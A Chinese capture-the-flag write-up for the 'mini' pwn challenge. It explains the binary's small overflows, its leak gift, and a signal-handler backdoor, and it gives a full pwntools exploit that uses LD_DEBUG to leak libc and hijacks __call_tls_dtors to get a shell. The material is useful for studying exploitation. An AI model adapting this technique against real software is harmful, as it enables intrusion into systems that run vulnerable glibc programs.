广州强网杯pwn_mini WP

阅读量    80141 |

分享到: QQ空间 新浪微博 微信 QQ facebook twitter

 

前言

这道题目是广州强网杯的一道题目,利用方式比较巧妙,题目给了两个字节溢出、和一个任意地址写,通过这些漏洞可以有一些利用的方法,但是有一种方法是很巧妙的,也是出题人想让我们利用的方式,程序本身预置了后门函数,后门函数以test身份重启了自身,然后exit了,而test身份是有一个任意地址写的。

 

分析

程序经过ida分析后,发现程序有两个参数运行,一个是test,一个real,test会有一个任意地址写,real会进入主程序。test任意写如下:

void __noreturn sub_1CB0()
{
  char *s[7]; // [rsp+0h] [rbp-38h] BYREF

  s[1] = (char *)__readfsqword(0x28u);
  puts("[+] Test remote IO.");
  __printf_chk(1LL, "Where: ");
  s[0] = 0LL;
  input(s, 8LL);
  __printf_chk(1LL, "Input: ");
  input(s[0], 144LL);
  __printf_chk(1LL, "Output: ");
  puts(s[0]);
  exit(0);
}

real主程序如下:

void __fastcall __noreturn main(int a1, char **a2, char **a3)
{
  const char *v4; // rbp
  const char *v5; // r15
  int v6; // ebx
  __int128 buf; // [rsp+110h] [rbp-58h] BYREF
  unsigned __int64 v8; // [rsp+128h] [rbp-40h]

  v8 = __readfsqword(0x28u);
  if ( a1 != 2 )
    goto LABEL_2;
  sub_16C0();
  v4 = a2[1];
  if ( !strcmp(v4, "test") )
    sub_1CB0();
  if ( strcmp(v4, "real") )
  {
LABEL_2:
    puts("Invalid.");
    exit(0);
  }
  sub_1770();
  buf = 0LL;
  *(_QWORD *)&::buf[48] = a3;  //envp
  *(_QWORD *)&::buf[56] = a2;
  __printf_chk(1LL, "User: ");
  input(&buf, 13LL);
  if ( !strcmp((const char *)&buf, "Administrator") )
  {
    puts("Login failed!");
    exit(0);
  }
  puts("Login successful!");
  while ( 1 )
  {
LABEL_7:
    v5 = aAddCard;
    v6 = 0;
    sub_1C20();                                 // menu 
    input(::buf, 50LL);                         // 2 bytes overflow can overflow envp 
    while ( strcmp(::buf, v5) )
    {
      ++v6;
      v5 += 16;
      if ( v6 == 6 )
      {
        puts("Illegal.");
        goto LABEL_7;
      }
    }
    off_4080[v6]();                             // 函数的数组
  }
}

主程序将a3(envp)放到了buf[48]的位置,但是在输入buf的时候大小是50,存在2字节溢出可以覆盖envp,menu所涉及的函数如下

.data:0000000000004080 off_4080        dq offset add_card      ; DATA XREF: main+102↑o
.data:0000000000004088                 dq offset Remove_Card
.data:0000000000004090                 dq offset Write_Card
.data:0000000000004098                 dq offset Read_Card
.data:00000000000040A0                 dq offset Bye_bye
.data:00000000000040A8                 dq offset sub_15C0      ; gift
.data:00000000000040A8 _data           ends

add函数如下:

int add_card()
{
  int v0; // ebx
  _QWORD *i; // rax
  int v2; // ebp
  __int64 v3; // rax
  void *v4; // rax
  int *v5; // rbx
  unsigned __int64 v7; // [rsp+8h] [rbp-20h]

  v0 = 0;
  v7 = __readfsqword(0x28u);
  for ( i = &unk_4140; i[1] || *(_DWORD *)i; i += 2 )
  {
    if ( ++v0 == 16 )
      return __readfsqword(0x28u) ^ v7;
  }
  __printf_chk(1LL, "Size: ");
  v2 = input_size();
  if ( (unsigned int)(v2 - 17) > 0x4F )
    return __readfsqword(0x28u) ^ v7;
  v4 = calloc(1uLL, v2);
  v5 = (int *)((char *)&unk_4140 + 16 * v0);
  *((_QWORD *)v5 + 1) = v4;
  if ( !v4 )
    exit(-1);
  *v5 = v2;
  __printf_chk(1LL, "Card: ");
  input(*((void **)v5 + 1), *v5);
  LODWORD(v3) = puts("OK.");
  return v3;
}

__int64 input_size()
{
  char v1[24]; // [rsp+0h] [rbp-28h] BYREF
  unsigned __int64 v2; // [rsp+18h] [rbp-10h]

  v2 = __readfsqword(0x28u);
  *(_OWORD *)v1 = 0LL;
  *(_QWORD *)&v1[16] = 0LL;
  input(v1, 25LL);                              // 1 byte overflow
  return strtol(v1, 0LL, 10);
}

这里input size有一字节溢出。此外程序还有一个隐藏的gift函数,可以泄露栈地址的最后两个字节

unsigned __int64 sub_15C0()
{
  int v1; // ebp
  int v2; // eax
  int v3; // edx
  int buf; // [rsp+4h] [rbp-24h] BYREF
  unsigned __int64 v5; // [rsp+8h] [rbp-20h]

  v5 = __readfsqword(0x28u);
  if ( !unk_4120 )
  {
    unk_4120 = 1;
    v1 = open("/dev/urandom", 0);
    read(v1, &buf, 4uLL);
    close(v1);
    v2 = buf & 3;
    switch ( v2 )
    {
      case 2:
        buf = 0xFFF;
        v3 = 0xFFF;
        break;
      case 3:
        buf = 0xFFFF;
        v3 = 0xFFFF;
        break;
      case 1:
        buf = 0xFF;
        v3 = 0xFF;
        break;
      default:
        buf = 0xF;
        v3 = 0xF;
        break;
    }
    __printf_chk(1LL, "Gift: %d\n", (unsigned int)&buf & v3); // 2 bytes leak stack 
  }
  return __readfsqword(0x28u) ^ v5;
}

除此之外,可以在程序初始化中有一个backdoor函数,可以以test参数重启程序,获得一次任意写能力:

unsigned int sub_16C0()
{
  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(stdout, 0LL, 2, 0LL);
  setvbuf(stderr, 0LL, 2, 0LL);
  signal(6, (__sighandler_t)handler);  <----backdoor>
  signal(14, (__sighandler_t)sub_14D0);
  return alarm(0x28u);
}

void __noreturn handler()   //以test重启自身
{
  __int64 v0; // rax
  char v1[88]; // [rsp+0h] [rbp-78h] BYREF
  unsigned __int64 v2; // [rsp+58h] [rbp-20h]

  v2 = __readfsqword(0x28u);
  v0 = *(_QWORD *)&buf[56];
  if ( v0 )
  {
    **(_DWORD **)(v0 + 8) = 0x74736574;   // test 参数
    *(_OWORD *)v1 = 0LL;
    *(_OWORD *)&v1[16] = 0LL;
    *(_OWORD *)&v1[32] = 0LL;
    *(_OWORD *)&v1[48] = 0LL;
    *(_OWORD *)&v1[64] = 0LL;
    readlink("/proc/self/exe", v1, 79uLL);   //复制符号到v1
    execve(v1, *(char *const **)&buf[56], *(char *const **)&buf[48]);// 重新执行程序
    exit(0);  // 退出
  }
  exit(-1);
}

 

利用思路

经过整理这些漏洞和后门,可以整理这样一个利用思路:
LD_DEBUG=all 这个环境变量,预示着程序执行时打印loader的信息,通过里面的信息可以获取libc地址。
首先利用 gift 功能泄露栈地址最后 2 字节,然后在栈上布置 LD_DEBUG=all 字串。通过全局变量的 2 字节溢出漏洞修改 envp 指针的最后2字节,使其指向栈上的 LD_DEBUG=all 字串指针。然后通过 1 字节的栈溢出触发 abort,从而使得程序重启并进入后门(此时相当于控制了环境变量为 LD_DEBUG=all)。

│ 0x55a99e08559f    mov    rdi, rbp
► 0x55a99e0855a2    call   execve@plt <execve@plt>
        path: 0x7ffd0ba916c0 ◂— '/home/yrl/exp/mini'
        argv: 0x7ffd0ba92348 —▸ 0x7ffd0ba93117 ◂— 0x7400696e696d2f2e /* './mini' */
        envp: 0x7ffd0ba920f0 —▸ 0x7ffd0ba92200 ◂— 'LD_DEBUG=all' 
  0x55a99e0855a7    xor    edi, edi

程序在重启时,就会打印调试信息,泄露libc地址,由于 libc 2.31 的 one_gadget 已经无法使用,所以最后利用任意地址写去劫持 exit_handlers 函数。

exit_handlers其实是用的stl结构,因为exit_handlers会用到stl结构,其中在__call_tls_dtors中会有一个call rax;的调用,在此之前我们只要将eax修改为system,再将其参数修改为‘/bin/sh’就行。往上追溯可以看到eax是由

0x7f9c9bd98424 <__call_tls_dtors+36>    mov    rax, qword ptr [rbp]
0x7f9c9bd98428 <__call_tls_dtors+40>    ror    rax, 0x11
0x7f9c9bd9842c <__call_tls_dtors+44>    xor    rax, qword ptr fs:[0x30]

控制,我们可以通过栈控制rax为0,然后fs:[0x30]为system地址就行,参数rdi通过mov rdi, qword ptr [rbp + 8]控制,改为/bin/sh,所以就可通过call rax;来getshell,值得注意的是fs寄存器我们看不了,就要确定fs:[0x30]到底在哪里,这就需要一定的经验,大致知道 tls 在mapped 那段地址上(即libc最后的那段没有名字的地址段上),exp的target的偏移是在fs:[0x30]附近,通过布栈根据target便宜来找fs:[0x30]具体在哪里,具体这个偏移只能不同版本,慢慢靠经验找;现在 glibc2.31 还是固定的,很好找,以前 2.27 每次重启都会变,所以打远程还要爆破

 

exp

# -*- coding: UTF-8 -*-
from pwn import *

context.log_level = 'debug'
#context.terminal = ["/usr/bin/tmux","sp","-h"]

# io = remote('127.0.0.1', 49158)
# libc = ELF('./libc-2.31.so')
io = process(['./mini', 'real'])
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

rl = lambda    a=False        : io.recvline(a)
ru = lambda a,b=True    : io.recvuntil(a,b)
rn = lambda x            : io.recvn(x)
sn = lambda x            : io.send(x)
sl = lambda x            : io.sendline(x)
sa = lambda a,b            : io.sendafter(a,b)
sla = lambda a,b        : io.sendlineafter(a,b)
irt = lambda            : io.interactive()
dbg = lambda text=None  : gdb.attach(io, text)
lg = lambda s            : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
uu32 = lambda data        : u32(data.ljust(4, '\x00'))
uu64 = lambda data        : u64(data.ljust(8, '\x00'))



sla('User: ', 'LD_DEBUG=all')  # 将LD_DEBUG=all放到栈上
# dbg()
# pause()
sla('>> ', '+_@*@&!$') # 触发后门gift,获取栈的最后两个字节

ru('Gift: ')                    # leak stack 2bytes
re = int(rl(), 10)
lg('re')
offset = re + 0x2c    # 通过泄露的两个字节确定LD_DEBUG=all的位置
lg('offset')
assert(offset & 0xf000)  # 确保两个字节

sa('>> ', 'A'*0x30+p16(offset))  # modify stack address envp (2bytes)-> LD_DENUG=all 通过两个字节溢出修改envp的最后两个字节使其指向LD_DEBUG=all

sla('>> ', 'Read_Card')
# dbg()
# pause()
sa('Index: ', 'B'*0x19) # 1byte onerflow  -> trigger abort  通过一字节溢出修改返回地址为非法地址,触发abort,使系统捕获异常进入后门函数,重启以test参数程序

ru('file=libc.so.6 [0];')         # test参数重启时打印debug信息,泄露libc,之后会有一个任意地址写
ru('base: ')
libc_base = int(ru('   size:'), 16)
lg('libc_base')

'''
   0x7f9c9bd98424 <__call_tls_dtors+36>    mov    rax, qword ptr [rbp]
   0x7f9c9bd98428 <__call_tls_dtors+40>    ror    rax, 0x11
   0x7f9c9bd9842c <__call_tls_dtors+44>    xor    rax, qword ptr fs:[0x30]
   0x7f9c9bd98435 <__call_tls_dtors+53>    mov    qword ptr fs:[rbx], rdx
   0x7f9c9bd98439 <__call_tls_dtors+57>    mov    rdi, qword ptr [rbp + 8]
 ► 0x7f9c9bd9843d <__call_tls_dtors+61>    call   rax <system>
        command: 0x7f9c9bf41568 ◂— 0x68732f6e69622f /* '/bin/sh' */

'''
target = libc_base + 0x1f34e8  # exit_handlers-> __call_tls_dtors->call rax; 确定劫持位置附近,通过偏移找到fs:[0x30],和rbp+8的位置,在rbp+8位置写入指向/bin/sh的指针
lg('target')
sla('Where: ', p64(target)[:-1])

paylaod = p64(target+0x70)
paylaod += 14*p64(0)
paylaod += p64(target+0x80)
paylaod += '/bin/sh\x00'
paylaod += p64(libc_base + libc.sym['system'])
sla('Input: ', paylaod[:-1])


irt()
分享到: QQ空间 新浪微博 微信 QQ facebook twitter
|推荐阅读
|发表评论
|评论列表
加载更多